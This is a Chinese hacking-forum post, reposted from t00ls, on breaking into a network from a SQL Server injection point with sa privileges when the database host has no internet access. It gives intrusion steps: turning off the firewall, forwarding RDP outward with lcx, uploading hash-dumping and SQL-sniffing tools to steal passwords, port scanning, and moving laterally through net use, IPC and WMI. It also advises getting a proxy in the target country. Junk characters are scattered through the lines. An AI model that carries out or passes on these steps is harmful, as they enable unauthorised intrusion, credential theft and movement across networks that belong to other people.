当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。( e! X }" ~# Z& R5 J% F
) h4 |- ]- \( J2 Q! e
5 w/ d5 H" L, J3 X) E
" @. D/ z* G* f" l e$ qSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
9 p# P/ l1 I8 @1 ?$ _/ N4 W, o" N
9 I, n3 R. J: y/ c0 C' l0 i% C) u! y% E r
一、DB机有公网IP.
" f# Y C* |8 n6 m
4 r7 g$ z a/ k; P3 U) r1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
& B2 Y/ k$ R, ^; r) ~" Q; E* Z6 ^6 ?
, X' t, ^) E; j4 U# Z2 n" y5 j9 s2 d$ U
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389. K! P9 F' k5 |( n& G
" C2 w' ?0 C9 C& n) V6 [6 H* q. x- @2 e7 g+ ~ n5 d5 W, ?
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
+ C6 w O" P, b- M% J' S `; v. Z. B5 i. j4 c c
# r6 P$ V# p2 ]/ y5 c. B) Q
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.5 f+ _' H" j2 c$ u4 h
! \5 S0 g/ f1 C' q
# n" t6 n* w# k" N/ [( x. r! ^' ]& \7 k4 h) {, O1 v! }
二、DB机只有内网IP' _* a$ v' |4 l' M& p( {
# {8 V/ h6 ?8 u/ q4 U, |( G
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
( p* ?: z+ y' {3 T1 T$ }9 c) a6 O8 k# P0 T) H$ S
! |: a# Z1 V4 ?8 k
2:停掉防火墙和IP策略再从内往外扫描.6 c i1 K, B, b3 h, ?
+ k% H' N& B# W. T8 L5 s9 b: h7 Q
% l/ H3 J" A2 n! g5 d" G: E3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
) d3 E+ }' S6 r: O) G3 L
# w! Z! @. k) s3 A$ g) M i% J$ t9 p
' U: ~) H6 y7 C, I, e7 P$ G5 W4:学会密码规律分析往往会有惊喜.1 D6 L. i% q: h: Y' T* `
4 ]2 |3 y1 {; Z/ } B/ [: u4 ?' d4 J* M" E$ d- l
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
1 t2 R$ k6 `. ]3 v& x6 J; j% b/ f, r* C* F6 K g9 F
1 c3 `2 `. y/ ^- p8 Z7 W
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |